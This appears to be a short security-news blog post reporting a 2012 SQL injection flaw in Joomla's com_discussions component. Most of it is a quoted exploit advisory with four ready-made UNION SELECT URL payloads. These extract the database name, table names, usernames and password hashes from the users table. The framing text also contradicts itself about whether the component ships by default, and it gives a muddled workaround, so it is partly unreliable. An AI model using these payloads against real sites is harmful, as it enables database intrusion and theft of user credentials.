New zero-day Joomla exploit in the wide

Hacked

New SQL injection exploit have been published targeting Joomla CMS, the Red Security TEAM have made the exploit available and allow to have database name or check all tables name also you can have the database users login and different user passwords.

The vulnerability exists in the discussion component of Joomla (com_discussions) that exist by default in any CMS, but the webmaster may activate this component for having the discussion enabled on website.

[php]
#
# Title     : Joomla Discussions Component (com_discussions) SQL Injection Vulnerability
# Author    : Red Security TEAM
# Date      : 17/01/2012
# Risk      : High
# Software  : http://extensions.joomla.org/<wbr>extensions/communication/<wbr>forum/13560
# Tested On : CentOS
# Contact   : Info [ 4t ] RedSecurity [ d0t ] COM
# Home      : http://RedSecurity.COM
#
# Exploit   :
# http://target.com/index.php?<wbr>option=com_discussions&view=<wbr>thread&catid=[SQLi]
#
# Example   :
#
# 1. [Get Database Name]
# http://target.com/index.php?<wbr>option=com_discussions&view=<wbr>thread&catid=1′ union all select concat(0x7e,0×27,unhex(Hex(<wbr>cast(database() as char))),0×27,0x7e)–+a
# 2. [Get  Tables  Name]
# http://target.com/index.php?<wbr>option=com_discussions&view=<wbr>thread&catid=1′ union all select (select concat(0x7e,0×27,count(table_name),0×27,0x7e) from `information_schema`.tables where table_schema=0x6F7574706F7374715F6F65646576)–+a
# 3. [Get      Username]
# http://target.com/index.php?<wbr>option=com_discussions&view=<wbr>thread&catid=1′ union all select (select concat(0x7e,0×27,unhex(Hex(cast(jos_users.username as char))),0×27,0x7e) from `[Database Name]`.jos_users Order by username limit 0,1) –+a
# 4. [Get      Password]
# http://target.com/index.php?<wbr>option=com_discussions&view=<wbr>thread&catid=1′ union all select (select concat(0x7e,0×27,unhex(Hex(cast(jos_users.password as char))),0×27,0x7e) from `[Database Name]`.jos_users Order by username limit 0,1) –+a
[/php]

As this is a zero day their still no update or patch for this vulnerability but as a workaround It is recommended to modify the source code of the page "index.php" to examine the URL parameter “catid” in the  #__contact_details table  before being used in SQL queries.

Exploit Source: http://packetstormsecurity.org/files/108759/joomladiscussions-sql.txt

 

Share
You can leave a response, or trackback from your own site.